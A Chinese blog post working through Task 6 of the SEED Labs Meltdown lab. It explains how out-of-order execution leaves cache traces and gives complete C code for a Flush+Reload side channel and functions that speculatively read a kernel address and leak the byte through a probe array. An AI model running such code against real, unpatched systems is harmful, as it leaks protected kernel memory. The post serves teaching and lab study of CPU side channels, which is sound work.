Meltdown Attack(6) - Seed Lab

最新推荐文章于 2022-12-03 23:18:25 发布
最新推荐文章于 2022-12-03 23:18:25 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 侧信道 文章标签: 内核
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013648063/article/details/105752570
版权

Task 6 CPU的乱序执行

这是Meltdown Attack的第l六个实验,原实验教程在此:
https://seedsecuritylabs.org/Labs_16.04/System/Meltdown_Attack/

从前面的任务中,我们可以知道,当一个程序试图读取内核内存时,访问会失败,并且产生一个异常。让我们看看下面的代码。

number = 0;
*kernel_address = (char*)0xf9ce8000;
kernel_data = *kernel_address;
number = number + kernel_data;

这段代码在第三行的时候会发生异常,因为fb61b000这个地址属于内核区域。所以第四行代码就不会被执行,因此number就仍然为0。

这种说法从CPU外部的角度看起来是正确的。然而实际上,从微体系结构的角度来看,第3行的代码会成功拿到内核的数据,第四行代码也会被执行。这是由于现代CPU乱序执行的机制导致的。如果CPU按指令原有的顺序一条一条地执行,当其中一条指令耗时比较长的时候,后面的指令就要等前面的指令完成才能执行,这就导致CPU中执行等待指令的单元空闲出来了,大大降低了CPU性能。因此CPU引入了乱序执行机制,让后面的指令可以超车到前面来执行,这样就可以充分利用CPU的所有部件,来提高CPU的性能。

在上面的代码中,第三行代码实际上完成了两个操作。第一个操作是加载数据,第二个操作是检查这个数据访问是否合法。如果数据已经在cache中了,那么第一个操作是很快完成的,而第二个操作就要等一会。所以为了避免等待,CPU会继续执行第四行的代码,同时并行执行第三行的第二个操作。直到检查完成,执行的结果是不会提交,所以我们也看不到第四行的执行结果。这样,你也许会说,那么这样不就保证安全了吗?

但是,Intel和其他做CPU的人犯了一个错误,这个错误导致了熔断攻击。虽然他们抹去了乱序执行对于内存和寄存器的影响。但是他们忽略了乱序执行对于cache的影响。由于乱序执行,第四行代码的结果也被存入到了cache中。那么我们使用Task1和2中提到的侧信道技术,就能观测到乱序执行对cache产生的影响,进而获取到secret data。

本次实验来观察乱序执行造成的影响。实验的代码如下:

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <fcntl.h>
#include <emmintrin.h>
#include <x86intrin.h>

/*********************** Flush + Reload ************************/
uint8_t array[256*4096];
/* cache hit time threshold assumed*/
#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

void flushSideChannel()
{
  int i;

  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;

  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}

void reloadSideChannel() 
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
     addr = &array[i*4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD){
         printf("array[%d*4096 + %d] is in cache.\n",i,DELTA);
         printf("The Secret = %d.\n",i);
     }
  }	
}
/*********************** Flush + Reload ************************/

void meltdown(unsigned long kernel_data_addr)
{
  char kernel_data = 0;
   
  // The following statement will cause an exception
  kernel_data = *(char*)kernel_data_addr;     
  array[7 * 4096 + DELTA] += 1;          
}

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;
   
   // Give eax register something to do
   asm volatile(
       ".rept 400;"                
       "add $0x141, %%eax;"
       ".endr;"                    
    
       :
       :
       : "eax"
   ); 
    
   // The following statement will cause an exception
   kernel_data = *(char*)kernel_data_addr;  
   array[kernel_data * 4096 + DELTA] += 1;           
}

// signal handler
static sigjmp_buf jbuf;
static void catch_segv()
{
  siglongjmp(jbuf, 1);
}

int main()
{
  // Register a signal handler
  signal(SIGSEGV, catch_segv);

  // FLUSH the probing array
  flushSideChannel();
    
  if (sigsetjmp(jbuf, 1) == 0) {
      meltdown(0xf9ce8000);    //replace actual address found from the kernel moudle
  }
  else {
      printf("Memory access violation!\n");
  }

  // RELOAD the probing array
  reloadSideChannel();                     
  return 0;
}

运行该代码,实验结果如下。
在这里插入图片描述

破落之实
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Meltdown-Attack
07-24
Meltdown-Attack
从入门到入土:[SEED-Lab]-幽灵攻击|Spectre Attack Lab|详细说明|实验步骤|实验截图
Q_U_A_R_T_E_R的博客
11-24 2457
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 [SEED-Lab]-Spectre Attack Lab实验环境PDF文件实验步骤环境配置Labsetup操作步骤Tasks 1 and 2: Side Channel Attacks via CPU CachesTask 1: Reading from Cache versu
SEEDLAB2.0-Spectre Attack Lab
Yale的博客
04-17 1819
Spectre Attack Lab Spectre在很多现代处理器中都有,比如Intel、AMD,ARM等 该漏洞允许程序突破进程内、进程间的隔离,如此,恶意程序就能从它不能访问的区域读取数据.本来这不应该发生,对于进程间隔离,有硬件保护机制;对于进程内隔离,有软件保护机制,但是CPU设计导致的缺陷使得攻击成为了可能。 注意,对于本实验的大多数代码,当使用gcc编译时都需要加上-march=native,march标志告诉编译器enable本地机器的所有指令子集。 Meltdown和Spectre都是利用
[SEEDLabs] Meltdown & Spectre Attack Labs
痛苦实验记录
04-21 3409
系统安全分类下的两个实验,放在一起写。Meltdown 和 Spectre 是两个关于体系结构的漏洞,主要是利用了缓冲延时的侧信道攻击方法。 这次实验用的是官方网站发布的预装环境的Ubuntu16,看官网的说明meltdown的大部分的实验在Ubuntu20上面也可以做,但是还是有不行的,spectre的话是两个版本都可以做,为了方便还是安装了Ubuntu16了。还有需要注意的就是这两个实验都是针对intel的处理器的,如果不是intel处理器的话实验可能不能成功。(我们老师的...
-SEED 2.0实验环境搭建
cherryc_的博客
12-03 2580
本文是在做seed lab安全实验前,将项目提供的ubuntu20.04系统安装在Virtual Box上的步骤记录和一些问题解决。
信息安全 SEED Lab8 Cross-Site Scripting (XSS) Attack Lab
crazyliu的博客
06-12 3578
这个实验主要是利用CSRF攻击来完成一些恶意的操作。由于整个实验过程要用到网站,这里先配置一下。 网站都部署在本地,且用域名访问,所以我们需要现在 /etc/hosts文件中设置域名到 IP 的映射关系。内容如下: 127.0.0.1 www.xsslabelgg.com 网站使用Apache作为服务器,在/etc/apache2/sites-available/000-default.conf配置一下网站主目录,内容如下: <VirtualHost *:80> .
Meltdown attack_Whitepaper
09-28
Whitepaper of meltdown attack. By Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg The security of ...
复旦大学_软件安全_SEED labs_9-Meltdown.zip
06-28
复旦大学_软件安全_SEED labs_9-Meltdown实验 是从雪城大学SEED labs上找的实验 资源包括: 攻击修改代码、实验报告详细版、实验指导书、参考链接
Meltdown BBS-开源
04-19
Meltdown BBS是一个免费的基于Web的公告板系统,用PHP编写,带有MySQL后端。 Meltdown BBS允许消息和文件交换以及对用户访问的高级控制。 它旨在与Fidonet技术网络兼容。
meltdown-charlie-code2html-convert-vb-source-code-to-html-color-format-preserved__1-27136
02-15
Code2HTML-将VB源代码转换为HTML-保留...描述 ... 有助于将代码段放入网页中... 更多信息 提交时间 2001-09-11 05:25:42 经过 等级 中间的 ...4.9(来自9位用户的44个地球仪) ...VB 4.0(32位),VB 5.0,VB 6.0 ... 存档文件
复旦大学_软件安全_SEED labs_8- Spectre.zip
06-27
复旦大学_软件安全_SEED labs_8- Spectre实验 是从雪城大学SEED labs上找的实验 资源包括: 攻击修改代码、实验报告详细版、实验指导书、参考链接
Intel CPU spectre漏洞利用方法
07-31
奥地利 Graz 理工大学的研究人员演示了通过网络远程利用 Spectre V1 漏洞的方法。他们将这一利用方法命名为 NetSpectre。通过 NetSpectre,攻击者无需在目标系统执行任何代码就能远程读取系统内存。
COMPUTER SECURITY A Hands-on Approach.rar
05-19
COMPUTER SECURITY A Hands-on Approach。计算机网络攻防入门详细解释计算机网络攻击(sql注入,xss等经典攻击类型),软件安全攻击,操作系统漏洞攻击等,杜文良教授倾心打造,配虚拟机和实验网站 https://seedsecuritylabs.org/
security实验.rar
06-20
security实验原型代码相关
SEED(1)-实验环境搭建
阿航的博客
06-29 8273
1. 下载VirtualBox 官网:Downloads – Oracle VM VirtualBox 2. 下载SEED Ubuntu 20.04 官网:https://seedsecuritylabs.org 选择Lab Setup; 点击DigitalOcean下载; 3. 在VirtualBox中配置Seed-Ubuntu20.04 解压SEED-Ubuntu20.04.zip文件 打开VirtualBox,点击控制 ->
Meltdown Attack(2) - Seed Lab
^_^
04-18 1003
这是Meltdown Attack的第二个实验,原实验教程在此: https://seedsecuritylabs.org/Labs_16.04/System/Meltdown_Attack/ Task 2 : 使用Cache作为侧信道 本实验的目的是利用函数的缺陷来从侧信道获取秘密信息。本次实验基于以下两点假设: 存在缺陷的函数使用一个secret作为索引来从数组加载值。 这个secret不能...
Meltdown Attack(1) - Seed Lab
^_^
04-18 1642
最近在了解Meltdown攻击,在网上发现了Syracuse University的Wenliang Du教授写的关于这方面的实验教程。感觉很受益,粗略地翻译了一部分,自己跟着做了实验,记录于此。 感兴趣的可以去原网址查看,讲义和代码都可以找到:https://seedsecuritylabs.org/Labs_16.04/System/Meltdown_Attack/ Task 1 :读Cach...
Meltdown Attack (3) - Seed Lab
^_^
04-18 1493
Task3 :把secret data放在内核空间中 本次实验是为Meltdown Attack做准备。主要目的是把secret data放在内核空间。以便后续我们以用户态获取到内核态的信息。就有点像插个旗子在内核,然后等我们后面去拿。 实现熔断攻击需要满足两个条件: 我们需要知道目标secret data的地址。下面代码的内核模块将secret data的地址保存在了内核信息缓冲区中,这样使用...
Meltdown Attack(5) - Seed Lab
^_^
04-25 852
Task 5 处理异常 在Task4中,我们从用户空间去访问内核内存会导致程序crash。在meltdown攻击中,在访问了内存区域后,我们必须做点什么处理,以防止程序崩溃。访问不可访问的内存区域会产生一个SIGSEGV信号,如果一个程序不能处理这个异常,那么操作系统会来处理,并且将其终止。这就是为什么Task 4 的程序崩溃的原因。要解决这种崩溃,我们可以在程序中俘获这种异常并进行处理。 不像C...
MeltDown攻击的基本指令及其解释
最新发布
03-28
MeltDown攻击是一种利用处理器漏洞的攻击方法,其基本指令包括: 1. MOV CR3, %reg:将CR3控制寄存器的值移动到寄存器%reg中。 2. MOV %reg, (%reg):将%reg寄存器中的值作为地址,将这个地址的内容移动到%reg...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

破落之实

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值